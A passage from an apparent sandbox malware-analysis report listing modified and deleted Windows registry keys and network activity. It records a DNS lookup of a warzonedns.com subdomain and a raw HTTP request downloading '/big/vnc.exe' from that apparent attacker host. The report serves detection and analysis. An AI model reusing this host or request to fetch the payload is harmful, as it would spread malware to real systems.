1123. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457515",
1124. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457496",
1125. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033929",
1126. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457491",
1127. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001103",
1128. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001104",
1129. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328935",
1130. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328972",
1131. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328990",
1132. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328951",
1133. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328986",
1134. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328975",
1135. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328998",
1136. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328983",
1137. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328932",
1138. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328908",
1139. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328884",
1140. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328940",
1141. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328925",
1142. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328919",
1143. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328916",
1144. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM02835233",
1145. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM01840907",
1146. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851221",
1147. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851217",
1148. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851224",
1149. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851223",
1150. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851226",
1151. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851225",
1152. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851227",
1153. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851220",
1154. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851219",
1155. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851216",
1156. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851222",
1157. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851218",
1158. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998159",
1159. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998158",
1160. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328905",
1161. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328893",
1162. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
1163. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
1164. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
1165. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
1166. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
1167. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\S38OS404-1Q43-42S2-9305-67QR0O28SP23\\rkcybere.rkr",
1168. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.106\\CheckSetting",
1169. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.101\\CheckSetting",
1170. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.103\\CheckSetting",
1171. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.100\\CheckSetting",
1172. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.102\\CheckSetting",
1173. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.104\\CheckSetting",
1174. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78.check.101\\CheckSetting"
1175.  
1176.  
1177. * Deleted Registry Keys:
1178. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\yn",
1179. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\cgl",
1180. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
1181. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
1182. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
1183. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
1184. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
1185. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
1186.  
1187.  
1188. * DNS Communications:
1189.  
1190. "type": "A",
1191. "request": "qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com",
1192. "answers":
1193.  
1194. "data": "23.249.165.218",
1195. "type": "A"
1196.  
1197.  
1198.  
1199.  
1200.  
1201. * Domains:
1202.  
1203. "ip": "23.249.165.218",
1204. "domain": "qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com"
1205.  
1206.  
1207.  
1208. * Network Communication - ICMP:
1209.  
1210. * Network Communication - HTTP:
1211.  
1212. "count": 1,
1213. "body": "",
1214. "uri": "http://qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com/big/vnc.exe",
1215. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
1216. "method": "GET",
1217. "host": "qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com",
1218. "version": "1.1",
1219. "path": "/big/vnc.exe",
1220. "data": "GET /big/vnc.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com\r\nConnection: Keep-Alive\r\n\r\n",
1221. "port": 80
1222.  
1223.  
1224.  
1225. * Network Communication - SMTP:
1226.  
1227. * Network Communication - Hosts:
1228.  
1229. "country_name": "United States",
1230. "ip": "23.249.165.218",
1231. "inaddrarpa": "",
1232. "hostname": "qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com"
1233.  
1234.  
1235.  
1236. * Network Communication - IRC: